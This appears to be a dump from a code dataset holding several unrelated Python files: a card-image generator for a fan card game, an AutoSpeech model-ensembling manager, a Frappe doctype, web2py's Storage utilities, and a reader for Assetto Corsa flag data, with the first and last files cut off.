def BarText(image, text, color):
bar_text_size = PIL_Helper.GetTextBlockSize(text, fonts["Bar"], textmaxwidth)
if bar_text_size[0] > BarTextThreshold[0]:
font = fonts["BarSmall"]
else:
font = fonts["Bar"]
PIL_Helper.AddText(
image=image,
text=text,
font=font,
fill=color,
anchor=Anchors["Bar"],
halign="right"
)
def BodyText(image, text, color, flavor_text_size=0, font=None):
# Replacement of keywords with symbols
for keyword in RulesDict:
if keyword in text:
text = text.replace(keyword, RulesDict[keyword])
text = FixUnicode(text)
if font is None:
font = fonts["Body"]
anchor = Anchors["Body"]
leading = -1
# Get the size of the body text as (w,h)
body_text_size = PIL_Helper.GetTextBlockSize(
text, fonts["Body"], textmaxwidth
)
# If the height of the body text plus the height of the flavor text
# doesn't fit in on the card in the normal position, move the body text up
if body_text_size[1] + flavor_text_size[1] > TextHeightThresholds[0]:
anchor = Anchors["BodyShiftedUp"]
# If they still don't fit, makes the body text smaller
if body_text_size[1] + flavor_text_size[1] > TextHeightThresholds[1]:
font = fonts["BodySmall"]
body_text_size = PIL_Helper.GetTextBlockSize(
text, font, textmaxwidth
)
# If they still don't fit, make it smaller again. They're probably
# the changeling cards
if body_text_size[1] + flavor_text_size[1] > TextHeightThresholds[1]:
font = fonts["BodyChangeling"]
leading = -3
Anchors["BodyShiftedUp"]
PIL_Helper.AddText(
image=image,
text=text,
font=font,
fill=color,
anchor=anchor,
halign="center",
max_width=textmaxwidth,
leading_offset=leading
)
def FlavorText(image, text, color):
return PIL_Helper.AddText(
image=image,
text=text,
font=fonts["Flavortext"],
fill=color,
anchor=Anchors["Flavor"],
valign="bottom",
halign="center",
leading_offset=+1,
max_width=textmaxwidth,
padline=True,
)
def GetExpansionIcon(expansion):
return PIL_Helper.LoadImage(ExpansionIconsPath + expansion)
def AddExpansion(image, expansion):
expansion_symbol = Expansions.get(expansion, None)
if expansion_symbol:
image.paste(expansion_symbol, Anchors["Expansion"], expansion_symbol)
def AddExpansionJSON(image, expansion_symbol):
if expansion_symbol:
image.paste(expansion_symbol, Anchors["Expansion"], expansion_symbol)
def CopyrightText(card, image, color, artist):
card_set = CardSet.replace('_', ' ')
client = None
if type(card).__name__ == 'dict':
client = card.get('client')
else:
if len(card) - 1 >= CLIENT:
client = str(card[CLIENT])
if client is not None:
card_set += " " + client
text = "{}; TSSSF by Horrible People Games. Art by {}.".format(
card_set,
artist
)
PIL_Helper.AddText(
image=image,
text=text,
font=fonts["Copyright"],
fill=color,
anchor=Anchors["Copyright"],
valign="bottom",
halign="right",
)
def MakeBlankCard():
image = PIL_Helper.BlankImage(base_w, base_h)
PIL_Helper.AddText(
image=image,
text="This Card Intentionally Left Blank",
font=fonts["Title"],
fill=ColorDict["Blankfill"],
anchor=Anchors["Blank"],
max_width=textmaxwidth
)
return image
def MakeStartCard(card):
if type(card).__name__ == 'dict':
return MakeStartCardJSON(card)
else:
return MakeStartCardPON(card)
def MakeStartCardJSON(data):
image = GetFrame(data['type'])
AddCardArt(image, data['picture'], Anchors["PonyArt"])
TitleText(image, data['title'], ColorDict["START"])
AddSymbols(image, data.get('symbols', []))
BarText(image, ', '.join(data.get('keywords', [])), ColorDict["START bar text"])
text_size = FlavorText(image, data.get('flavor', ''), ColorDict["START flavor"])
BodyText(image, data.get('body', ''), ColorDict["START"], text_size)
CopyrightText(data, image, ColorDict["Copyright"], data.get('artist', ARTIST))
if Expansion_Icon is not None:
AddExpansionJSON(image, Expansion_Icon)
return image
def MakeStartCardPON(tags):
image = GetFrame(tags[TYPE])
AddCardArt(image, tags[PICTURE], Anchors["PonyArt"])
TitleText(image, tags[TITLE], ColorDict["START"])
AddSymbols(image, tags[SYMBOLS].split('!'))
BarText(image, tags[KEYWORDS], ColorDict["START bar text"])
text_size = FlavorText(image, tags[FLAVOR], ColorDict["START flavor"])
BodyText(image, tags[BODY], ColorDict["START"], text_size)
CopyrightText(tags, image, ColorDict["Copyright"], ARTIST)
if len(tags) > EXPANSION:
AddExpansion(image, tags[EXPANSION])
return image
def MakePonyCard(card):
if type(card).__name__ == 'dict':
return MakePonyCardJSON(card)
else:
return MakePonyCardPON(card)
def MakePonyCardJSON(data):
image = GetFrame(data['type'])
AddCardArt(image, data['picture'], Anchors["PonyArt"])
TitleText(image, data['title'], ColorDict["Pony"])
AddSymbols(image, data.get('symbols', []))
BarText(image, ', '.join(data.get('keywords', [])), ColorDict["Pony bar text"])
text_size = FlavorText(image, data.get('flavor', ''), ColorDict["Pony flavor"])
BodyText(image, data.get('body', ''), ColorDict["Pony"], text_size)
CopyrightText(data, image, ColorDict["Copyright"], data.get('artist', ARTIST))
if Expansion_Icon is not None:
AddExpansionJSON(image, Expansion_Icon)
return image
def MakePonyCardPON(tags):
image = GetFrame(tags[TYPE])
AddCardArt(image, tags[PICTURE], Anchors["PonyArt"])
TitleText(image, tags[TITLE], ColorDict["Pony"])
AddSymbols(image, tags[SYMBOLS].split('!'))
BarText(image, tags[KEYWORDS], ColorDict["Pony bar text"])
text_size = FlavorText(image, tags[FLAVOR], ColorDict["Pony flavor"])
BodyText(image, tags[BODY], ColorDict["Pony"], text_size)
CopyrightText(tags, image, ColorDict["Copyright"], ARTIST)
if len(tags) > EXPANSION:
AddExpansion(image, tags[EXPANSION])
return image
def MakeShipCard(card):
if type(card).__name__ == 'dict':
return MakeShipCardJSON(card)
else:
return MakeShipCardPON(card)
def MakeShipCardJSON(data):
image = GetFrame(data['type'])
AddCardArt(image, data['picture'], Anchors["ShipArt"])
TitleText(image, data['title'], ColorDict["Ship"])
AddSymbols(image, data.get('symbols', []), "Ship")
BarText(image, ', '.join(data.get('keywords', [])), ColorDict["Ship bar text"])
text_size = FlavorText(image, data.get('flavor', ''), ColorDict["Ship flavor"])
BodyText(image, data.get('body', ''), ColorDict["Ship"], text_size)
CopyrightText(data, image, ColorDict["Copyright"], data.get('artist', ARTIST))
if Expansion_Icon is not None:
AddExpansionJSON(image, Expansion_Icon)
return image
def MakeShipCardPON(tags):
image = GetFrame(tags[TYPE])
AddCardArt(image, tags[PICTURE], Anchors["ShipArt"])
TitleText(image, tags[TITLE], ColorDict["Ship"])
AddSymbols(image, tags[SYMBOLS].split('!'), "Ship")
BarText(image, tags[KEYWORDS], ColorDict["Ship bar text"])
text_size = FlavorText(image, tags[FLAVOR], ColorDict["Ship flavor"])
BodyText(image, tags[BODY], ColorDict["Ship"], text_size)
CopyrightText(tags, image, ColorDict["Copyright"], ARTIST)
if len(tags) > EXPANSION:
AddExpansion(image, tags[EXPANSION])
return image
def MakeGoalCard(card):
if type(card).__name__ == 'dict':
return MakeGoalCardJSON(card)
else:
return MakeGoalCardPON(card)
def MakeGoalCardJSON(data):
image = GetFrame(data['type'])
AddCardArt(image, data['picture'], Anchors["GoalArt"])
TitleText(image, data['title'], ColorDict["Goal"])
AddSymbols(image, data.get('symbols', []), card_type="Goal")
text_size = FlavorText(image, data.get('flavor', ''), ColorDict["Goal flavor"])
BodyText(image, data.get('body', ''), ColorDict["Goal"], text_size)
CopyrightText(data, image, ColorDict["Copyright"], data.get('artist', ARTIST))
if Expansion_Icon is not None:
AddExpansionJSON(image, Expansion_Icon)
return image
def MakeGoalCardPON(tags):
image = GetFrame(tags[TYPE])
AddCardArt(image, tags[PICTURE], Anchors["GoalArt"])
TitleText(image, tags[TITLE], ColorDict["Goal"])
AddSymbols(image, tags[SYMBOLS].split('!'), card_type="Goal")
text_size = FlavorText(image, tags[FLAVOR], ColorDict["Goal flavor"])
BodyText(image, tags[BODY], ColorDict["Goal"], text_size)
CopyrightText(tags, image, ColorDict["Copyright"], ARTIST)
if len(tags) > EXPANSION:
AddExpansion(image, tags[EXPANSION])
return image
def MakeSpecialCard(card):
if type(card).__name__ == 'dict':
return MakeSpecialCardJSON(card)
else:
return MakeSpecialCardPON(card)
def MakeSpecialCardJSON(data):
print repr(data['picture'])
image = GetFrame(data['picture'])
if data['picture'] in special_cards_with_copyright:
CopyrightText(data, image, ColorDict["Copyright"], data.get('artist', ARTIST))
if Expansion_Icon is not None:
AddExpansionJSON(image, Expansion_Icon)
return image
def MakeSpecialCardPON(data):
print repr(data[PICTURE])
image = GetFrame(data[PICTURE])
if data[PICTURE] in special_cards_with_copyright:
CopyrightText(data, image, ColorDict["Copyright"], ARTIST)
if len(data) > EXPANSION:
AddExpansion(image, data[EXPANSION])
return image
def InitVassalModule():
pass
def MakeVassalCard(im):
VassalCard[0] += 1
im.save(VassalImagesPath + "/" + str(VassalCard[0]) + ".png")
def CompileVassalModule():
pass
if __name__ == "__main__":
print "Not a main module. Run GameGen.py"
| 38.954802 | 254 | 0.660334 |
4a1e4517221b3683f57f42f71b6525a011c60093 | 15,748 | py | Python | mysubmission/model_manager.py | 279632990/AutoSpeech2020 | 0b4c035dac937638c18dd34d842b18f6534b2bab | [
"Apache-2.0"
] | 4 | 2020-05-19T03:48:35.000Z | 2020-08-21T00:56:53.000Z | mysubmission/model_manager.py | 279632990/AutoSpeech2020 | 0b4c035dac937638c18dd34d842b18f6534b2bab | [
"Apache-2.0"
] | null | null | null | mysubmission/model_manager.py | 279632990/AutoSpeech2020 | 0b4c035dac937638c18dd34d842b18f6534b2bab | [
"Apache-2.0"
] | 1 | 2020-06-02T11:57:35.000Z | 2020-06-02T11:57:35.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by HazzaCheng on 2019-09-22
import gc
import numpy as np
from sklearn.metrics import roc_auc_score, accuracy_score
from tensorflow.python.keras import backend as K
from CONSTANT import CLASS_NUM, MODEL_FIRST_MAX_RUN_LOOP, FIRST_ROUND_DURATION, SECOND_ROUND_DURATION
from models import * # import all models and model_name constant
from models.crnn2d import Crnn2dModel
from models.crnn2d_larger import Crnn2dLargerModel
from models.crnn2d_vgg import Crnn2dVggModel
from models.my_classifier import Classifier
from models.cnn import CnnModel2D
from tools import log
def auc_metric(solution, prediction):
if solution.sum(axis=0).min() == 0:
return np.nan
auc = roc_auc_score(solution, prediction, average='macro')
return np.mean(auc * 2 - 1)
def acc_metric(solution, prediction):
if solution.sum(axis=0).min() == 0:
return np.nan
acc = accuracy_score(solution, prediction)
return acc
class ModelManager(Classifier):
def __init__(self,
meta,
data_manager,
keep_num=5,
each_model_keep_num=3,
each_model_top_k=2,
patience=3,
auc_threshold=0.5,
*args,
**kwargs):
self.metadata = meta
self._data_manager = data_manager
self._keep_num = keep_num
self._each_model_keep_num = each_model_keep_num
self._each_model_top_k = each_model_top_k
self._patience = patience
self._not_rise_num = 0
self._input_shape = None
self._model = None
self._model_name = None
self._last_model_name = None
self._cur_model_run_loop = 0
self._model_num = 0
self._model_idx = 0
self._round_num = 0
self._val_set = None
self._test_x = None
self._use_new_train = False
self._is_reset_model = False
self._use_mfcc = True
self._is_nedd_30s = False
self._use_mel_round = None
self._k_best_predicts = [-1] * self._keep_num
self._k_best_auc = [-1.1] * self._keep_num
self._each_model_best_predict = {}
self._each_model_best_auc = {}
self._cur_model_max_auc = -1
self._auc_threshold = auc_threshold
self._num_classes = self.metadata[CLASS_NUM]
self._model_lib = {
LR_MODEL: LogisticRegression,
LSTM_MODEL: LstmAttention,
CRNN_MODEL: CrnnModel,
CRNN2D_MODEL: Crnn2dModel,
CRNN2D_LARGER_MODEL: Crnn2dLargerModel,
CRNN2D_VGG_MODEL: Crnn2dVggModel,
BILSTM_MODEL: BilstmAttention,
CNN_MODEL_2D: CnnModel2D,
SVM_MODEL: SvmModel,
ATTGRU: AttentionGru
}
self._model_sequences = [
LR_MODEL,
CRNN_MODEL,
#CNN_MODEL_2D,
BILSTM_MODEL,
LSTM_MODEL
]
self._max_first_model_run_loop = MODEL_FIRST_MAX_RUN_LOOP
self._max_model_run_loop = 12
self._models = {}
def _get_or_create_model(self):
# use new model and not reset model, have to initialize the model
if not self._model.is_init:
log(f'get new model {self._model_name}')
# init model parameters
if self._model_name == CNN_MODEL_2D:
kwargs = {
'input_shape': self._input_shape[1:],
'num_classes': self.metadata[CLASS_NUM],
'max_layer_num': 10
}
elif self._model_name in [LSTM_MODEL, BILSTM_MODEL, CRNN_MODEL, CRNN2D_MODEL, CRNN2D_LARGER_MODEL,
CRNN2D_VGG_MODEL, ATTGRU]:
kwargs = {
'input_shape': self._input_shape[1:],
'num_classes': self.metadata[CLASS_NUM],
}
elif self._model_name == SVM_MODEL:
kwargs = {
'kernel': 'linear',
'max_iter': 1000
}
elif self._model_name == LR_MODEL:
kwargs = {
'kernel': 'liblinear',
'max_iter': 100
}
else:
raise Exception("No such model!")
if not self._model.is_init:
self._model.init_model(**kwargs)
log(f'This train loop use {self._model_name}, last train loop use {self._last_model_name}')
def _pre_select_model(self, train_loop_num):
self._last_model_name = self._model_name
if train_loop_num == 1 or self._model_name is None:
self._model_name = self._model_sequences[0]
self._each_model_best_auc[self._model_name] = [-1]
self._each_model_best_predict[self._model_name] = [-1]
self._use_new_train = True
if self._not_rise_num == self._patience \
or (self._model_num == 0 and self._cur_model_run_loop >= self._max_first_model_run_loop) \
or (self._round_num == 0 and self._cur_model_run_loop >= self._max_model_run_loop):
self._model_idx += 1
if self._model_idx == len(
self._model_sequences) and LR_MODEL in self._model_sequences:
# TODO be careful!
self._model_idx = 1
self._round_num += 1
if self._round_num > 1:
self._patience = 4
# sort model sequences by auc, desc
if not self._data_manager.crnn_first:
self._model_sequences = [self._model_sequences[0]] \
+ sorted(self._model_sequences[1:],
key=lambda x: self._each_model_best_auc[x][-1], reverse=True)
else:
self._model_sequences.remove(CRNN_MODEL)
self._model_sequences = [self._model_sequences[0]] + [CRNN_MODEL] \
+ sorted(self._model_sequences[1:],
key=lambda x: self._each_model_best_auc[x][-1], reverse=True)
log(
f'round {self._round_num} start, model sequences {self._model_sequences[self._model_idx:]}')
self._model_name = self._model_sequences[self._model_idx]
self._model_num += 1
self._not_rise_num = 0
log(
f'change model from {self._last_model_name} to {self._model_name}, loop_num: {self._cur_model_run_loop}')
self._use_new_train = self._model_num in [0,
1,
(2 * (len(self._model_sequences) - 1)) + 1,
(3 * (len(self._model_sequences) - 1)) + 1,
(4 * (len(self._model_sequences) - 1)) + 1]
self._is_reset_model = (self._round_num > 1
and self._model_num == self._round_num * (len(self._model_sequences) - 1) + 1)
if self._use_new_train:
self._test_x = None
self._cur_model_run_loop = 0
if self._round_num == 0 and self._cur_model_run_loop == 0:
self._each_model_best_auc[self._model_name] = [-1]
self._each_model_best_predict[self._model_name] = [-1]
self._cur_model_max_auc = -1
elif self._round_num == 1 and self._cur_model_run_loop == 0:
self._cur_model_max_auc = self._each_model_best_auc[self._model_name][-1]
elif self._round_num >= 2 and self._cur_model_run_loop == 0:
self._each_model_best_auc[self._model_name] += [-1]
self._each_model_best_predict[self._model_name] += [-1]
self._cur_model_max_auc = -1
if self._is_reset_model:
log(f'new round {self._round_num}')
# clear all models
self._models.clear()
del self._model
self._model = None
gc.collect()
K.clear_session()
# self._new_round = False
if self._model_name != self._last_model_name or self._model is None or self._is_reset_model:
if self._model_name in self._models:
self._model = self._models[self._model_name]
else:
self._model = self._model_lib[self._model_name]()
self._models[self._model_name] = self._model
def _get_each_model_top_k_predicts(self):
predicts = []
for k, v in self._each_model_best_auc.items():
if k == LR_MODEL:
continue
k_predicts = np.asarray(self._each_model_best_predict[k])
temp = [(auc, k_predicts[i]) for i, auc in enumerate(v)
if auc > max(self._auc_threshold, self._k_best_auc[0] - 0.1)]
temp.sort(key=lambda x: x[0], reverse=True)
predicts.extend(temp[:self._each_model_top_k])
if len(predicts) == 0:
return [], []
predicts = sorted(predicts, key=lambda x: x[0], reverse=True)[
:self._each_model_keep_num]
top_k_aucs = [predicts[i][0] for i in range(len(predicts))]
top_k_predicts = [predicts[i][1] for i in range(len(predicts))]
return top_k_aucs, top_k_predicts
def _blending_ensemble(self):
selected_k_best = [self._k_best_predicts[i]
for i, a in enumerate(self._k_best_auc) if a > 0.0]
each_model_k_aucs, selected_each_model_k_best = self._get_each_model_top_k_predicts()
if self._round_num >= 2:
selected = selected_k_best + selected_each_model_k_best
else:
selected = selected_k_best
log(f"model_num: {self._model_num} Select k best {self._keep_num} predicts which have auc {self._k_best_auc}, "
f"each model {self._each_model_keep_num} best which have auc {each_model_k_aucs}, "
f"and each previous model's best predict which have auc "
f"{[f'({k}:{v})' for k, v in self._each_model_best_auc.items()]} ")
return np.mean(selected, axis=0)
@property
def data_manager(self):
return self._data_manager
def fit(self, train_loop_num=1, **kwargs):
# select model first, inorder to use preprocess data method
self._pre_select_model(train_loop_num)
log(f'fit {self._model_name} for {self._cur_model_run_loop} times')
self._cur_model_run_loop += 1
# get data
if self._round_num == 0:
train_x, train_y, val_x, val_y = self._data_manager.get_train_data(train_loop_num=train_loop_num,
model_num=self._model_num,
round_num=self._round_num,
use_new_train=self._use_new_train,
use_mfcc=self._use_mfcc)
self._is_nedd_30s = self._data_manager.need_30s
if self._is_nedd_30s:
self._use_mel_round = 3
else:
self._use_mel_round = 2
else:
if self._round_num == self._use_mel_round:
self._use_mfcc = False
else:
self._use_mfcc = True
train_x, train_y, val_x, val_y = self._data_manager.get_train_data(train_loop_num=train_loop_num,
model_num=self._model_num,
round_num=self._round_num,
use_new_train=self._use_new_train,
use_mfcc=self._use_mfcc)
self._val_set = (val_x, val_y)
self._input_shape = train_x.shape
log(f'train_x: {train_x.shape}; train_y: {train_y.shape};'
f' val_x: {val_x.shape}; val_y: {val_y.shape};')
# init model really
self._get_or_create_model()
self._model.fit(train_x, train_y, (val_x, val_y),
self._round_num, **kwargs)
def predict(self, test_x, is_final_test_x=False):
x_val, y_val = self._val_set
auc = auc_metric(y_val, self._model.predict(x_val))
need_predict = False
dif_score = 0.1
if auc > self._cur_model_max_auc:
log(
f'cur_max_auc {self._cur_model_max_auc}; cur_auc {auc}; {self._model_name} auc rise for {self._cur_model_run_loop} times')
self._cur_model_max_auc = auc
if self._round_num == 0:
self._not_rise_num = max(0, self._not_rise_num - 1)
else:
self._not_rise_num = 0
if auc > self._each_model_best_auc[LR_MODEL][-1] - dif_score:
need_predict = True
else:
self._not_rise_num += 1
log(
f'cur_max_auc {self._cur_model_max_auc}; cur_auc {auc}; {self._model_name} auc not rise for {self._not_rise_num} times')
if max(self._k_best_auc[-1], self._each_model_best_auc[LR_MODEL]
[-1] - dif_score) >= auc and not need_predict:
log('not predict')
else:
log(f'new predict')
if is_final_test_x:
if self._test_x is None:
if self._model_num == 0:
self._test_x = self._data_manager.lr_preprocess(test_x)
elif self._round_num == 0:
self._test_x = self._data_manager.nn_preprocess(test_x,
n_mfcc=96,
max_duration=FIRST_ROUND_DURATION,
is_mfcc=self._use_mfcc)
else:
self._test_x = self._data_manager.nn_preprocess(test_x,
n_mfcc=128,
max_duration=SECOND_ROUND_DURATION,
is_mfcc=self._use_mfcc)
if self._round_num > 1:
y_pred = self._model.predict(self._test_x, batch_size=32)
else:
y_pred = self._model.predict(self._test_x, batch_size=32 * 8)
if self._k_best_auc[-1] < auc and auc > self._each_model_best_auc[LR_MODEL][-1] - dif_score:
self._k_best_predicts[-1] = y_pred
self._k_best_auc[-1] = auc
if self._each_model_best_auc[self._model_name][-1] < auc:
self._each_model_best_predict[self._model_name][-1] = y_pred
self._each_model_best_auc[self._model_name][-1] = auc
i = 0
for auc, pred in sorted(
zip(self._k_best_auc, self._k_best_predicts), key=lambda x: x[0], reverse=True):
self._k_best_auc[i] = auc
self._k_best_predicts[i] = pred
i += 1
self._use_new_train = False
self._is_reset_model = False
return self._blending_ensemble()
| 44.112045 | 138 | 0.540767 |
4a1e4524728a0939102446bd86307c02279f077f | 392 | py | Python | gia/gia/doctype/gia_sector/gia_sector.py | alkuhlani/gia | 9af9737cef7b0b947baa21f46c7be381c4fc9d98 | [
"MIT"
] | null | null | null | gia/gia/doctype/gia_sector/gia_sector.py | alkuhlani/gia | 9af9737cef7b0b947baa21f46c7be381c4fc9d98 | [
"MIT"
] | null | null | null | gia/gia/doctype/gia_sector/gia_sector.py | alkuhlani/gia | 9af9737cef7b0b947baa21f46c7be381c4fc9d98 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2020, Ahmed Mohammed Alkuhlani and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, throw
from frappe.model.document import Document
class GIASector(Document):
def validate(self):
if not self.parent_gia_sector:
frappe.throw(_("Please enter the parent"))
| 28 | 63 | 0.772959 |
4a1e46a7f54e2a95801606c48bddb681c93163be | 8,726 | py | Python | gluon/storage.py | gitoni/web2py | 76cfba704716b2314c28ee8bcb5b09fca34163d8 | [
"BSD-3-Clause"
] | null | null | null | gluon/storage.py | gitoni/web2py | 76cfba704716b2314c28ee8bcb5b09fca34163d8 | [
"BSD-3-Clause"
] | null | null | null | gluon/storage.py | gitoni/web2py | 76cfba704716b2314c28ee8bcb5b09fca34163d8 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <[email protected]>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Provides:
- List; like list but returns None instead of IndexOutOfBounds
- Storage; like dictionary allowing also for `obj.foo` for `obj['foo']`
"""
try:
import cPickle as pickle
except:
import pickle
import copy_reg
import gluon.portalocker as portalocker
__all__ = ['List', 'Storage', 'Settings', 'Messages',
'StorageList', 'load_storage', 'save_storage']
DEFAULT = lambda: 0
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
in addition to `obj['foo']`, and setting obj.foo = None deletes item foo.
Example::
>>> o = Storage(a=1)
>>> print o.a
1
>>> o['a']
1
>>> o.a = 2
>>> print o['a']
2
>>> del o.a
>>> print o.a
None
"""
__slots__ = ()
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
__getitem__ = dict.get
__getattr__ = dict.get
__getnewargs__ = lambda self: getattr(dict,self).__getnewargs__(self)
__repr__ = lambda self: '<Storage %s>' % dict.__repr__(self)
# http://stackoverflow.com/questions/5247250/why-does-pickle-getstate-accept-as-a-return-value-the-very-instance-it-requi
__getstate__ = lambda self: None
__copy__ = lambda self: Storage(self)
def getlist(self, key):
"""
Returns a Storage value as a list.
If the value is a list it will be returned as-is.
If object is None, an empty list will be returned.
Otherwise, `[value]` will be returned.
Example output for a query string of `?x=abc&y=abc&y=def`::
>>> request = Storage()
>>> request.vars = Storage()
>>> request.vars.x = 'abc'
>>> request.vars.y = ['abc', 'def']
>>> request.vars.getlist('x')
['abc']
>>> request.vars.getlist('y')
['abc', 'def']
>>> request.vars.getlist('z')
[]
"""
value = self.get(key, [])
if value is None or isinstance(value, (list, tuple)):
return value
else:
return [value]
def getfirst(self, key, default=None):
"""
Returns the first value of a list or the value itself when given a
`request.vars` style key.
If the value is a list, its first item will be returned;
otherwise, the value will be returned as-is.
Example output for a query string of `?x=abc&y=abc&y=def`::
>>> request = Storage()
>>> request.vars = Storage()
>>> request.vars.x = 'abc'
>>> request.vars.y = ['abc', 'def']
>>> request.vars.getfirst('x')
'abc'
>>> request.vars.getfirst('y')
'abc'
>>> request.vars.getfirst('z')
"""
values = self.getlist(key)
return values[0] if values else default
def getlast(self, key, default=None):
"""
Returns the last value of a list or value itself when given a
`request.vars` style key.
If the value is a list, the last item will be returned;
otherwise, the value will be returned as-is.
Simulated output with a query string of `?x=abc&y=abc&y=def`::
>>> request = Storage()
>>> request.vars = Storage()
>>> request.vars.x = 'abc'
>>> request.vars.y = ['abc', 'def']
>>> request.vars.getlast('x')
'abc'
>>> request.vars.getlast('y')
'def'
>>> request.vars.getlast('z')
"""
values = self.getlist(key)
return values[-1] if values else default
def pickle_storage(s):
return Storage, (dict(s),)
copy_reg.pickle(Storage, pickle_storage)
PICKABLE = (str, int, long, float, bool, list, dict, tuple, set)
class StorageList(Storage):
"""
Behaves like Storage but missing elements defaults to [] instead of None
"""
def __getitem__(self, key):
return self.__getattr__(key)
def __getattr__(self, key):
if key in self:
return self.get(key)
else:
r = []
self[key] = r
return r
def load_storage(filename):
fp = None
try:
fp = portalocker.LockedFile(filename, 'rb')
storage = pickle.load(fp)
finally:
if fp:
fp.close()
return Storage(storage)
def save_storage(storage, filename):
fp = None
try:
fp = portalocker.LockedFile(filename, 'wb')
pickle.dump(dict(storage), fp)
finally:
if fp:
fp.close()
class Settings(Storage):
def __setattr__(self, key, value):
if key != 'lock_keys' and self['lock_keys'] and key not in self:
raise SyntaxError('setting key \'%s\' does not exist' % key)
if key != 'lock_values' and self['lock_values']:
raise SyntaxError('setting value cannot be changed: %s' % key)
self[key] = value
class Messages(Settings):
def __init__(self, T):
Storage.__init__(self, T=T)
def __getattr__(self, key):
value = self[key]
if isinstance(value, str):
return self.T(value)
return value
class FastStorage(dict):
"""
Eventually this should replace class Storage but causes memory leak
because of http://bugs.python.org/issue1469629
>>> s = FastStorage()
>>> s.a = 1
>>> s.a
1
>>> s['a']
1
>>> s.b
>>> s['b']
>>> s['b']=2
>>> s['b']
2
>>> s.b
2
>>> isinstance(s,dict)
True
>>> dict(s)
{'a': 1, 'b': 2}
>>> dict(FastStorage(s))
{'a': 1, 'b': 2}
>>> import pickle
>>> s = pickle.loads(pickle.dumps(s))
>>> dict(s)
{'a': 1, 'b': 2}
>>> del s.b
>>> del s.a
>>> s.a
>>> s.b
>>> s['a']
>>> s['b']
"""
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self.__dict__ = self
def __getattr__(self, key):
return getattr(self, key) if key in self else None
def __getitem__(self, key):
return dict.get(self, key, None)
def copy(self):
self.__dict__ = {}
s = FastStorage(self)
self.__dict__ = self
return s
def __repr__(self):
return '<Storage %s>' % dict.__repr__(self)
def __getstate__(self):
return dict(self)
def __setstate__(self, sdict):
dict.__init__(self, sdict)
self.__dict__ = self
def update(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self.__dict__ = self
class List(list):
"""
Like a regular python list but a[i] if i is out of bounds returns None
instead of `IndexOutOfBounds`.
"""
def __call__(self, i, default=DEFAULT, cast=None, otherwise=None):
"""Allows to use a special syntax for fast-check of `request.args()`
validity
Args:
i: index
default: use this value if arg not found
cast: type cast
otherwise: can be:
- None: results in a 404
- str: redirect to this address
- callable: calls the function (nothing is passed)
Example:
You can use::
request.args(0,default=0,cast=int,otherwise='http://error_url')
request.args(0,default=0,cast=int,otherwise=lambda:...)
"""
value = self[i]
if not value and default is not DEFAULT:
value, cast, otherwise = default, False, False
try:
if cast:
value = cast(value)
if not value and otherwise:
raise ValueError('Otherwise will raised.')
except (ValueError, TypeError):
from http import HTTP, redirect
if otherwise is None:
raise HTTP(404)
elif isinstance(otherwise, str):
redirect(otherwise)
elif callable(otherwise):
return otherwise()
else:
raise RuntimeError("invalid otherwise")
return value
def __getitem__(self, i):
n = len(self)
if 0 <= i < n or -n <= i < 0:
return super(List, self).__getitem__(i)
return None
if __name__ == '__main__':
import doctest
doctest.testmod()
| 26.932099 | 125 | 0.54011 |
4a1e482706b0fe2f57851f6ade703b686afe5de9 | 1,456 | py | Python | sims/ac.py | joshua-hampton/phue-racing-flags | 4a4247fba591f120c8be74418c915d791855f757 | [
"MIT"
] | 50 | 2021-06-04T21:30:55.000Z | 2022-01-07T15:31:32.000Z | sims/ac.py | joshua-hampton/phue-racing-flags | 4a4247fba591f120c8be74418c915d791855f757 | [
"MIT"
] | 11 | 2021-06-05T07:40:53.000Z | 2022-02-16T08:37:41.000Z | sims/ac.py | joshua-hampton/phue-racing-flags | 4a4247fba591f120c8be74418c915d791855f757 | [
"MIT"
] | 3 | 2021-06-07T19:55:33.000Z | 2021-12-23T05:27:25.000Z | from ctypes import Structure, sizeof, c_float, c_wchar, c_int
import mmap
from enum import Enum
class SPageFileGraphic(Structure):
_fields_ = [
("packetId", c_int),
("AC_STATUS", c_int),
("AC_SESSION_TYPE", c_int),
("currentTime", c_wchar * 15),
("lastTime", c_wchar * 15),
("bestTime", c_wchar * 15),
("split", c_wchar * 15),
("completedLaps", c_int),
("position", c_int),
("iCurrentTime", c_int),
("iLastTime", c_int),
("iBestTime", c_int),
("sessionTimeLeft", c_float),
("distanceTraveled", c_float),
("isInPit", c_int),
("currentSectorIndex", c_int),
("lastSectorTime", c_int),
("numberOfLaps", c_int),
("tyreCompound", c_wchar * 33),
("replayTimeMultiplier", c_float),
("normalizedCarPosition", c_float),
("carCoordinates", c_float * 3),
("penaltyTime", c_float),
("flag", c_int),
("idealLineOn", c_int),
("isInPitLane", c_int),
("surfaceGrip", c_float),
]
class ACFlagType(Enum):
AC_NO_FLAG = 0
AC_BLUE_FLAG = 1
AC_YELLOW_FLAG = 2
AC_BLACK_FLAG = 3
AC_WHITE_FLAG = 4
AC_CHECKERED_FLAG = 5
AC_PENALTY_FLAG = 6
def get_flag() -> ACFlagType:
buf = mmap.mmap(-1, sizeof(SPageFileGraphic), u"Local\\acpmf_graphics")
data = SPageFileGraphic.from_buffer(buf)
return ACFlagType(data.flag) | 28.54902 | 75 | 0.584478 |
4a1e490f80b1432729bd1da24476ec9af71e1ac7 | 7,012 | py | Python | tests/integration/generate_fixtures/common.py | kseikyo/web3.py | 8bc987e8ec2089133fbaf870dd0daa71e7447584 | [
"MIT"
] | 2 | 2019-09-27T09:33:10.000Z | 2019-10-09T10:34:04.000Z | tests/integration/generate_fixtures/common.py | kseikyo/web3.py | 8bc987e8ec2089133fbaf870dd0daa71e7447584 | [
"MIT"
] | null | null | null | tests/integration/generate_fixtures/common.py | kseikyo/web3.py | 8bc987e8ec2089133fbaf870dd0daa71e7447584 | [
"MIT"
] | 2 | 2019-02-26T23:01:31.000Z | 2019-03-03T02:10:57.000Z | import contextlib
import os
import shutil
import signal
import socket
import subprocess
import tempfile
import time
from eth_utils import (
is_checksum_address,
to_text,
)
